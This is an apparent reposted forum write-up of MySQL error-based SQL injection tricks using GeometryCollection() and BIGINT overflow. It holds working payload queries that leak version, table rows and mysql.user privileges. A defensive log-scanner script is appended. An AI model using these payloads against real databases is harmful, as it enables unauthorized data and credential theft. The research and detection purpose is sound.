Nytro Posted September 30, 2014

By spari

Earlier today, I got some spare time and played a little with the function GeometryCollection(). Basically, this function constructs a geometry collection. Sounds nice, but the interesting part is that we can only use it with an adjusted function, like point(x,y). For example:

mysql> SELECT GeometryCollection(point(53,12));

and output:

+----------------------------------+
| GeometryCollection(point(53,12)) |
| geometry(4294967295)             |
+----------------------------------+
| ??? ??                           |
+----------------------------------+

As we can see, the output is some gibberish. Now let's try it without POINT():

mysql> SELECT GeometryCollection(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing

Wow, wait, what? We got an error on our x argument, 53. GeometryCollection() can't process this, because GeometryCollection() doesn't know how to recognize x,y. After I saw that, I thought "why stop here?", maybe I can play with this a little more. So, as expected, I tried to pull out the version, like that:

mysql> SELECT GeometryCollection(a) from (select version()a)x;
Error 1367 (22007): Illegal non geometric '`x`.`a`' value found during parsing

Mmm.. only possible to see the alias. Not good enough. But wait, if we can see the alias, so maybe NAME_CONST() will do the trick? Well, no. Theoretically yes, but the problem is we can't call it. From here, the way to exploitation was really short:

mysql> SELECT GeometryCollection((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing

And we get a short, new error based, without spaces and commas. Let's try to pull out more stuff, maybe some columns from mysql.user:

mysql> SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_priv) from mysql.user)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing

Hope I expanded your mind. Comments will be nice.

[The Russian commentary that followed in the original post is lost to encoding; only the word "error-based" and the examples it accompanied survive.]

mysql> SELECT 18446744073709551610 * 2;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
mysql> SELECT -1 * 9223372036854775808;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

mysql> SELECT 123 abc d;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd' at line 1

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'

More here: https://rdot.org/forum/showthread.php?p=37133
And here: https://rdot.org/forum/showthread.php?t=3167
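As an added example that is not part of the post above, here is a small Python scanner a defender could run over a MySQL general query log or application error log to flag lines shaped like the probes and server errors shown in the post (GeometryCollection() fed a subquery, arithmetic on the BIGINT UNSIGNED boundary, if() with a subquery condition, and ERROR 1367/1690). The log lines and pattern names are constructed here for illustration.

```python
import re

# Patterns derived from the examples in the post (added example, not the post's code).
PATTERNS = {
    # GeometryCollection() given a subquery instead of a geometry (the ERROR 1367 trick)
    "geometrycollection_subquery": re.compile(
        r"geometrycollection\s*\(\s*\(?\s*select\b", re.IGNORECASE),
    # constants sitting on the BIGINT UNSIGNED boundary used to force ERROR 1690
    "bigint_overflow_probe": re.compile(
        r"\b(18446744073709551610|9223372036854775808)\b"),
    # if(<subquery> ...) whose branches are the near-max constant
    "if_overflow_oracle": re.compile(
        r"\bif\s*\(\s*\(?\s*select\b.*18446744073709551610", re.IGNORECASE),
    # the server-side error lines those probes produce
    "error_1367_or_1690": re.compile(
        r"\berror (1367|1690) \(22\d{3}\)", re.IGNORECASE),
}


def classify(line):
    """Return the names of every pattern that matches one log line."""
    return [name for name, rx in PATTERNS.items() if rx.search(line)]


def scan(lines):
    """Return (line_index, matched_pattern_names) for each suspicious line."""
    results = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample log (not real traffic): two benign queries, then four lines
# modelled on the post's own queries and error messages.
SAMPLE_LOG = [
    "SELECT GeometryCollection(point(53,12))",
    "SELECT id, name FROM products WHERE id = 42",
    "SELECT GeometryCollection((select*from(select*from(select@@version)f)x))",
    "SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))",
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'",
    "ERROR 1367 (22007): Illegal non geometric '53' value found during parsing",
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(hits)}")
```

A single hit on the constant alone is weak evidence; the subquery patterns and a matching 1367/1690 error from the same client are what make the line worth an alert.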